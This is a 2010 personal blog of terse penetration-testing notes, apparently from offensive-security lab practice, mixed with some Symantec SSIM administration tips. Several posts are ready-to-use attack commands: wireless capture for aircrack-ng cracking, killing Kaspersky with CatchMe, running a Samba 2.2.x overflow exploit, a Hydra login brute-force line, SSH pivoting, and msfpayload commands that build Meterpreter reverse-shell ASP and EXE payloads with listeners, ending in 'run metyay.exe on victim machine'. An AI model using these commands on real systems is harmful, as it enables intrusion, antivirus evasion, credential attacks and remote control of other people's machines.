Thursday, April 29, 2010

Use OS X Airport for wireless sniffing

Scan for networks:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en1 scan

Sniff:
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport sniff

Create a symbolic link to the binary so you can easily execute it from your path if you wish.

Resultant sniff will dump the *.cap file in /tmp. Use aircrack-ng to crack the cap file now once you've captured enough IVs and/or handshake.
Posted by at 5 comments:
Labels: , ,

Monday, April 26, 2010

Disabling Kaspersky via CatchMe.exe

Kaspersky Anti-Virus is a pain such that Meterpreter cannot disable it via the command "killav". Administrative privs still does not give you enough permissions because the Anti Virus nests itself into the kernel.


The following is destructive, read more about CatchMe before issuing the commands:

catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" [file]
reboot

or

attempt to remove catchme.exe from memory with: Darkspy, Seem, Icesword GUI

Above information found here in a nice Meterpreter cheatsheet:





Posted by at No comments:
Labels:

Sunday, April 25, 2010

Samba 2.2.x Exploit

A nice oldie that worked for me:
http://www.milw0rm.com/exploits/7

From Nessus:
Samba <>

An attacker needs to be able to access at least one share to exploit
this flaw.

In addition, it is reported that Samba contains a flaw
related to the handling of .reg files that may allow
a local user to overwrite arbitrary file.

Usage:
./samba_2.2.8_bufferoverflow.pl -tlinx86 -H [local_ip] -h[victim_ip]
Posted by at No comments:
Labels:

Friday, April 23, 2010

THC-Hydra HTTP-POST-FORM bug

On BackTrack Final 4, there is a bug with Hydra that will prevent you from brute forcing HTTP-POST/GET forms. See following description:

To solve:

Download source:

Get patch:

Apply patch:
$[path_to_hydra_src] < patch -p1 [patch_file]

$./configure
$ make
$ sudo make install

You may receive a libssh error like I did. This was a bug in the pre-final release of BackTrack. To apply the libssh patch download:


Patch again:
$[path_to_hydra_src] < patch -p1 [patch_file]

$./configure
$ make
$ sudo make install


Example command:
hydra -t2 -e ns -L ~/projects/offsec/users.txt -P ~/projects/offsec/passwords.txt -f 192.168.11.223 http-post-form "/flatfilelogin/login.php:username=^USER^&password=^PASS^&submit=Login:Incorrect" -V

Where /flatfilelogin/login.php is the POST BACK action form.
username is username's input field form ID
password is the password's input field form ID
Incorrect is the bad display image. Note: You should check whether this string is returned back by the post back page, otherwise Hydra will return always as successful.
Note to self: If you are receiving false positives, check for other potential hidden POST form fields to also include.

Posted by at No comments:
Labels: ,

Symantec SIM - High Availibility - Restoring Incidents

The following is not supported by Symantec. Modify at your own risk:

In the event of a catastrophic failure on a SSIM correlation device, we need to be able to restore the incidents on a secondary backup SSIM. DB2 restore in the web console effectively restores the incidents, however if you were to attempt to drill down into the incidents to pull up additional information on specific events, it will still reference the archive on the failed SSIM. We need to be able to reference the new archive on the secondary SSIM.


Events stored in /eventarchive are regularly backed up to an external storage device. These events will be transferred to the secondary backup SSIM in case the primary SSIM fails. Thus the filenames stored in /eventarchive will be identical.

To re-point the incidents to the new archive, a new unique archive ID needs to be generated, and the incidents need to point to the new archive ID. You cannot have two archives with the same ID even if they are on different correlation managers.

The incidents reference the event archive via a hex encoded value.

Issue following query as db2admin:

$ db2 connect to sesa
$ db2 -x "SELECT SESA_GUID FROM symcmgmt.symc_imr_associated_event_view"

Example output:
638a:20100318103824:700001

The first item 638a before the colon references the unique archive ID. This needs to be changed to the new archive ID of the secondary backup SSIM.
Posted by at No comments:
Labels: , , ,

Thursday, April 22, 2010

SSH Tunneling

Using a machine as a pivot/proxy, we need to make an unrouteable remote machine's service routeable. Following example tunnels port 445.

My IP: 192.168.10.88
Machine 1: 192.168.11.72 //We have access to this machine. Has route to machine 2
Machine 2: 10.2.2.50 //Unrouteable from my local machine

On Machine 1, create the tunnel to map remote TCP port 445 to my machine's local TCP port 445.
$ssh -l [local_username] -R [local_port]:[remote_ip]:[remote_port] [local_ip]
$ssh -l liuser -R 445:10.2.2.50:445 192.168.10.88

Confirm with netstat -nat for listening port.

Commonly used for exploiting unrouteable services.
Posted by at No comments:
Labels: ,

Symantec Security Information Manager (SSIM) LDAP Mods

Symantec does not recommend customizing the LDAP tree. It is not included in Symantec's Technical Support contract.

However, I find there are a slew of things you customize which are nice features that I wish Symantec included. For example automating updates to user look up tables, auto-import of users, failover settings, etc. These attributes are all stored in the LDAP tree.

Mod at your own risk:

Connection information:
Port 636 (SSL)
Protocol LDAP v3
USERID=Administrator,ou=People,DC=[your_domain],O=SYMC_SES

LDAP Search using objectClass=* as a filter locally on the SSIM:

$ldapsearch -h localhost -Z -K /etc/symantec/ses/key.kdb -b "o=symc_ses" -D 'USERID=Administrator,ou=People,DC=[your_domain],O=SYMC_SES' -w [admin_password]" "objectClass=*"


Jxplorer is a nice tool for LDAP browsing SSIM. You may see some fields storing XML (for example symcMetaData for the userlook up tables). These fields need to be base64 encoded prior to setting the attribute.

Modifying look up tables for example:

ldapsearch -h localhost -Z -K /etc/symantec/ses/key.kdb -b "cn=Lookup Tables,cn=Rule Engine,cn=SIM,ou=Administration,dc=[DOMAIN],o=symc_ses" -D 'USERID=Administrator,ou=People,DC=[DOMAIN],O=SYMC_SES' -w [PASSWORD] "dlmCaption=[TABLE_NAME]"

This is the ldif I am importing:

dn: orderedCimKeys=Symc_Setting.SettingID\=[TABLE_NAME],cn=Lookup Tables,cn =Rule Engine,cn=SIM,ou=Administration,dc=[DOMAIN],o=symc_ses changetype: modify replace: cisProperty cisProperty:: JXR5cGVzLHRleHQsdGV4dCx0ZXh0DQolbmFtZXMsIlVzZXJuYW1lIiwiRmlyc3RuYW1lIiwiTGFz dG5hbWUiDQoNCiJzcG9uZ2Vib2IiLCJzcG9uZ2Vib2JmaXJzdG5hbWUiLCJzcG9uZ2Vib2JsYXN0 bmFtZSINCiJwYXRyaWNrIiwicGF0cmlja2ZpcnN0IiwicGF0cmlja2xhc3QiDQoicGF0cmljazIi LCJwYXRyaWNrZmlyc3QyIiwicGF0cmlja2xhc3QyIg0KInBhdHJpY2szIiwicGF0cmlja2ZpcnN0 MyIsInBhdHJpY2tsYXN0MyI=  -

To get the resulting table:

%types,text,text,text  %names,"Username","Firstname","Lastname"  "spongebob","spongebobfirstname","spongeboblastname"  "patrick","patrickfirst","patricklast"  "patrick2","patrickfirst2","patricklast2"  "patrick3","patrickfirst3","patricklast3"

You also need to modify the LDAP attribute symcSequenceRevision with an updated timestamp. This time stamp is in Zulu time format. If you do not update this, then the table will not be updated.

Posted by at No comments:
Labels: , ,

SNMP Set Example command

Following command will set the "sysContact.o" attribute to Novacoast

$snmpset -v2c -c private [target_machine] SNMPv2-MIB::sysContact.0 s Novacoast
SNMPv2-MIB::sysContact.0 = STRING: Novacoast

Re-query to check the set was successful:

$ snmpwalk -v2c -c private [target_machine] | grep sysContact
SNMPv2-MIB::sysContact.0 = STRING: Novacoast
Posted by at No comments:
Labels: ,

Metasploit Meterpreter Evil ASP

ASP:
./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] R | msfencode -o evil_liuser.asp

$msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST [localhost_ip]
msf > exploit

Execute evil_liuser.asp via browser.
Posted by at No comments:
Labels: ,

Metasploit Meterpreter Windows Executable Payload

Creating the payload executable:

./msfpayload windows/meterpreter/reverse_tcp LHOST=[localhost_ip] LPORT=[local_port] X > metyay.exe

$msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > LHOST [localhost_ip]
msf > exploit

Run metyay.exe on victim machine.
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)